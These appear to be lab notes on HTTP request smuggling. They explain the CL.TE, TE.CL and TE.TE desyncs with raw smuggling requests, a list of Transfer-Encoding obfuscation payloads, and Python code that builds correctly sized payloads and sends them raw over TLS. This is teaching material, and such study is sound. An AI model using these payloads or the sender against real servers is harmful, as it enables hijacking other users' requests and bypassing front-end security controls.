
HTTP Request Smuggling

The HTTP/1 specification provides two different methods for specifying the length of HTTP messages. It is possible for a single message to use both methods at once, such that they conflict with each other. The specification attempts to prevent this problem by stating that if both the Content-Length and Transfer-Encoding headers are present, then the Content-Length header must be ignored and the body is framed by the chunked encoding.

Content-Length
Transfer-Encoding

Classic request smuggling attacks involve placing both the Content-Length header and the Transfer-Encoding header into a single HTTP/1 request and manipulating these so that the front-end and back-end servers process the request differently. The exact way in which this is done depends on the behavior of the two servers:

To set this up in Burp Repeater, open "Inspector" and then "Request attributes" (that is where the protocol version of the request is selected).


CL.TE: the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.

TE.CL: the front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.

TE.TE: the front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.

Example (CL.TE; Content-Length: 30 counts every byte of the body from the 0 line through Foo: x, line breaks included):

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 30
Connection: keep-alive
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
Foo: x
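The following Python model is added here as an illustration; it is not part of the original notes nor PortSwigger's material. frame() splits a byte stream into messages the way a server that prefers Content-Length ("CL") or Transfer-Encoding ("TE") would. It is a simplified parser (CRLF line endings only, no trailers, no error handling), not any real server's code. It is run over the CL.TE example above and over the TE.CL lab request further down in these notes (with a placeholder host and without the User-Agent header), each followed by VICTIM, a constructed request standing in for the next request that arrives on the same back-end connection.

```python
# Added example: how two HTTP/1 parsers frame the same bytes differently.
# Simplified model, not a real server implementation.

def parse_head(stream):
    """Split the next message head off `stream`.
    Returns (request_line, headers, rest) or None if the head is incomplete."""
    end = stream.find(b"\r\n\r\n")
    if end < 0:
        return None
    lines = stream[:end].split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, stream[end + 4:]

def read_chunked(rest):
    """Consume a chunked body. Returns (body, remaining) or None if incomplete."""
    body = b""
    while True:
        nl = rest.find(b"\r\n")
        if nl < 0:
            return None
        size = int(rest[:nl].split(b";")[0], 16)   # hex chunk size, extensions ignored
        rest = rest[nl + 2:]
        if size == 0:                              # last chunk, then an empty trailer
            return (body, rest[2:]) if rest.startswith(b"\r\n") else None
        if len(rest) < size + 2:
            return None
        body += rest[:size]
        rest = rest[size + 2:]                     # skip the data and its CRLF

def frame(stream, prefers):
    """Split `stream` into (request_line, body) messages the way a server
    preferring "CL" or "TE" would; also return the bytes it could not frame yet."""
    messages = []
    while True:
        parsed = parse_head(stream)
        if parsed is None:
            return messages, stream
        req_line, headers, rest = parsed
        chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
        has_cl = b"content-length" in headers
        if chunked and (prefers == "TE" or not has_cl):
            result = read_chunked(rest)
            if result is None:
                return messages, stream            # body incomplete: keep waiting
            body, stream = result
        elif has_cl:
            n = int(headers[b"content-length"])
            if len(rest) < n:
                return messages, stream            # body incomplete: keep waiting
            body, stream = rest[:n], rest[n:]
        else:
            body, stream = b"", rest
        messages.append((req_line, body))

# The CL.TE example from the notes, byte for byte.
CL_TE = (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
         b"Content-Length: 30\r\nConnection: keep-alive\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\nGET /404 HTTP/1.1\r\nFoo: x")

# The TE.CL lab request from the notes (placeholder host, User-Agent dropped).
TE_CL = (b"POST / HTTP/1.1\r\nHost: lab.example\r\nContent-Length: 4\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n"
         b"5e\r\nGPOST / HTTP/1.1\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 14\r\n\r\nx=123\r\n0\r\n\r\n")

# Constructed: the next request to arrive on the same back-end connection.
VICTIM = b"GET / HTTP/1.1\r\nHost: vulnerable-website.com\r\n\r\n"

def desync(attack, front, back):
    """Return what the front-end frames, what the back-end frames, the bytes the
    back-end keeps, and what the back-end frames once VICTIM follows them."""
    front_msgs, _ = frame(attack, front)
    back_msgs, leftover = frame(attack, back)
    next_msgs, _ = frame(leftover + VICTIM, back)
    return front_msgs, back_msgs, leftover, next_msgs

if __name__ == "__main__":
    for name, attack, front, back in (("CL.TE", CL_TE, "CL", "TE"),
                                      ("TE.CL", TE_CL, "TE", "CL")):
        f, b, left, nxt = desync(attack, front, back)
        print(name, "front-end saw", [m[0] for m in f], "| back-end saw", [m[0] for m in b])
        print("      back-end then handles:", [m[0] for m in nxt])
```

In the CL.TE case the front-end sees one 30-byte body while the back-end stops at the 0 chunk and keeps "GET /404 HTTP/1.1\r\nFoo: x", so the victim's request line is swallowed into the Foo header and the back-end serves /404. In the TE.CL case the back-end takes only "5e\r\n" as the body and parses the chunk data as a second request whose declared 14-byte body is 2 bytes short, so it completes it with the first two bytes of the victim's request.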
  1. CL.TE behavior - I built the following request to do the exercise:
POST / HTTP/1.1
Host: 0ab7007003e4da9d80cb1c1700260069.web-security-academy.net
Content-Length: 8
Connection: keep-alive
Transfer-Encoding: chunked

0

G


NB: note that Content-Length must hold the byte count of the body with the line breaks included: 0, CRLF, CRLF, G, CRLF. In other words, every line break (two bytes, \r\n) counts toward the number given in Content-Length, while the blank line that ends the headers does not; here 0\r\n\r\nG\r\n is 8 bytes. Since the line break after the G is inside the counted body, what the back-end holds for the next request is "G" followed by a line break; if the goal is for the back-end to read GPOST as the method of the next request, end the body immediately after the G and use Content-Length: 6.

Another point to consider is that the request must be sent as HTTP/1.0 or HTTP/1.1: the attack relies on Content-Length and Transfer-Encoding for framing, which HTTP/2 does not use, so the protocol version must be forced to HTTP/1 in Burp.

  2. TE.CL behavior - With the request below I was able to complete the exercise:
POST / HTTP/1.1
Host: 0acd009a0334db86801d4e3800880056.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

5e
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

x=123
0


Explanation:

Content-Length: 4 = the body of the outer request as the back-end sees it: the chunk-size line and its line break, "5e\r\n", 4 bytes.

5e = hexadecimal size (94 bytes) of the smuggled request, counted from the G of "GPOST / HTTP/1.1" to the 3 of "x=123", every line break inside that span included. The line break after x=123 is not part of the count, because it terminates the chunk; the 0 line that follows is the final chunk.

Content-Length: 14 = the body length the back-end will apply to the smuggled GPOST request. Only 12 bytes actually follow its headers ("x=123\r\n0\r\n\r\n"), so the back-end waits for 2 more; they are taken from the start of the next request sent over that connection, which is what makes GPOST get processed with that request's bytes appended to it.
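To avoid counting bytes by hand, here is an added Python helper (mine, not from the notes or the lab) that builds both payloads and reports the numbers. For a smuggled "G" it gives Content-Length 6 for the CL.TE case (8 if the G is followed by a line break, as in the CL.TE request above), and for the TE.CL request above with inner body x=123 it reproduces the chunk size 5e, the outer Content-Length 4 and the inner Content-Length 14. send_raw() is a hypothetical helper that writes the payload over a plain TLS socket without offering ALPN, so the server speaks HTTP/1.1 and nothing on the client side rewrites Content-Length; the host name is a placeholder.

```python
# Added example: framing numbers for the CL.TE and TE.CL payloads, plus a raw sender.
import socket
import ssl

def cl_te_payload(host, smuggled):
    """CL.TE: Content-Length covers the whole body ('0', the blank line and the
    smuggled bytes, every CRLF counted) so the front-end forwards all of it; the
    back-end stops after the 0 chunk and keeps `smuggled` for the next request.
    Returns (payload, content_length)."""
    body = b"0\r\n\r\n" + smuggled
    head = (b"POST / HTTP/1.1\r\n"
            + b"Host: " + host + b"\r\n"
            + b"Connection: keep-alive\r\n"
            + b"Content-Type: application/x-www-form-urlencoded\r\n"
            + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            + b"Transfer-Encoding: chunked\r\n\r\n")
    return head + body, len(body)

def te_cl_payload(host, inner_body, overshoot=2):
    """TE.CL: the chunk size is the byte count of the smuggled request from the
    'G' of GPOST to the last byte of `inner_body` (the CRLF after it terminates
    the chunk and is not counted); the outer Content-Length covers only the size
    line and its CRLF. The inner Content-Length is `overshoot` bytes above what
    really follows the inner headers, so the back-end holds the GPOST request
    until the next request on the connection supplies the missing bytes.
    Returns (payload, chunk_size, outer_cl, inner_cl)."""
    trailer = b"\r\n0\r\n\r\n"                      # chunk CRLF + final chunk
    inner_cl = len(inner_body + trailer) + overshoot  # bytes present + overshoot
    inner = (b"GPOST / HTTP/1.1\r\n"
             + b"Content-Type: application/x-www-form-urlencoded\r\n"
             + b"Content-Length: " + str(inner_cl).encode() + b"\r\n\r\n"
             + inner_body)
    size_line = b"%x\r\n" % len(inner)
    head = (b"POST / HTTP/1.1\r\n"
            + b"Host: " + host + b"\r\n"
            + b"Content-Type: application/x-www-form-urlencoded\r\n"
            + b"Content-Length: " + str(len(size_line)).encode() + b"\r\n"
            + b"Transfer-Encoding: chunked\r\n\r\n")
    return head + size_line + inner + trailer, len(inner), len(size_line), inner_cl

def send_raw(host, payload, port=443, timeout=10):
    """Hypothetical helper: send `payload` unchanged over TLS (no ALPN offered,
    so the server speaks HTTP/1.1) and return what it answers before closing."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(payload)
            chunks = []
            while True:
                try:
                    data = tls.recv(65536)
                except socket.timeout:
                    break
                if not data:
                    break
                chunks.append(data)
    return b"".join(chunks)

if __name__ == "__main__":
    _, cl = cl_te_payload(b"lab.example", b"G")
    print("CL.TE Content-Length for '0\\r\\n\\r\\nG':", cl)
    _, size, outer_cl, inner_cl = te_cl_payload(b"lab.example", b"x=123")
    print("TE.CL chunk size %x, outer Content-Length %d, inner Content-Length %d"
          % (size, outer_cl, inner_cl))
```

Recount with the helper every time the smuggled request is edited: a single byte of drift between the chunk size and the data changes where the back-end's next request starts, and that is the usual reason a payload that worked once stops working.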

  3. TE.TE behavior

Possible payloads (ways of obfuscating the Transfer-Encoding header so that only one of the two servers processes it):

Transfer-Encoding: xchunked

Transfer-Encoding : chunked

Transfer-Encoding: chunked
Transfer-Encoding: x

Transfer-Encoding:[tab]chunked

[space]Transfer-Encoding: chunked

X: X[\n]Transfer-Encoding: chunked

Transfer-Encoding
: chunked
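As an added illustration (this code is not part of the notes), two hypothetical header parsers are run over each of the variants above. strict_framing models an RFC 7230-conformant parser: lines split on CRLF only, token field names, obsolete line folding rejected, and the message treated as chunked only when the final transfer coding is "chunked". lenient_framing models a forgiving parser that splits on any line ending, strips whitespace around the field name and takes the first Transfer-Encoding it finds. Each returns "chunked", "content-length" or "reject". The TE.TE window exists exactly where the two answers differ; a real server that answers "reject" with a 400 closes it, while one that silently falls back to Content-Length keeps it open, and telling those two apart is what the probe is for.

```python
# Added example: why the TE.TE obfuscations split a strict and a lenient parser.
import re

# RFC 7230 "token" characters, the only ones allowed in a field name.
TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+\Z")

def strict_framing(head):
    """Model of an RFC-conformant parser. Returns 'chunked', 'content-length'
    or 'reject' (the message would get a 400 and the connection closed)."""
    codings = []
    for line in head.split(b"\r\n")[1:]:
        if line[:1] in (b" ", b"\t"):
            return "reject"                 # obsolete line folding
        name, sep, value = line.partition(b":")
        if not sep or not TOKEN.match(name) or b"\r" in value or b"\n" in value:
            return "reject"                 # malformed field line
        if name.lower() == b"transfer-encoding":
            codings += [c.strip().lower() for c in value.split(b",")]
    if not codings:
        return "content-length"
    # chunked must be the final coding, otherwise the length is undeterminable
    return "chunked" if codings[-1] == b"chunked" else "reject"

def lenient_framing(head):
    """Model of a forgiving parser: any line ending, whitespace stripped around
    the name, first Transfer-Encoding wins, 'chunked' anywhere in the value."""
    for line in head.splitlines()[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"transfer-encoding":
            return "chunked" if b"chunked" in value.lower() else "content-length"
    return "content-length"

# The variants listed above, as the raw header bytes they stand for.
VARIANTS = {
    "xchunked":           b"Transfer-Encoding: xchunked",
    "space before colon": b"Transfer-Encoding : chunked",
    "duplicate header":   b"Transfer-Encoding: chunked\r\nTransfer-Encoding: x",
    "tab after colon":    b"Transfer-Encoding:\tchunked",
    "leading space":      b" Transfer-Encoding: chunked",
    "bare LF":            b"X: X\nTransfer-Encoding: chunked",
    "split line":         b"Transfer-Encoding\r\n: chunked",
}

def compare(variants=VARIANTS):
    """Embed each variant in a constructed request head and return
    {label: (strict_result, lenient_result)}."""
    results = {}
    for label, field in variants.items():
        head = b"POST / HTTP/1.1\r\nHost: example\r\n" + field + b"\r\nContent-Length: 6"
        results[label] = (strict_framing(head), lenient_framing(head))
    return results

if __name__ == "__main__":
    for label, (strict, lenient) in compare().items():
        flag = "" if strict == lenient else "   <- parsers disagree"
        print("%-20s strict=%-15s lenient=%-15s%s" % (label, strict, lenient, flag))
```

Only the tab-after-colon variant is accepted by both models, because a tab is legal optional whitespace after the colon; that variant targets servers that are stricter than the RFC. The split-line variant is the mirror case: both models refuse to see chunked, so it needs a server that joins the two lines, which neither model does.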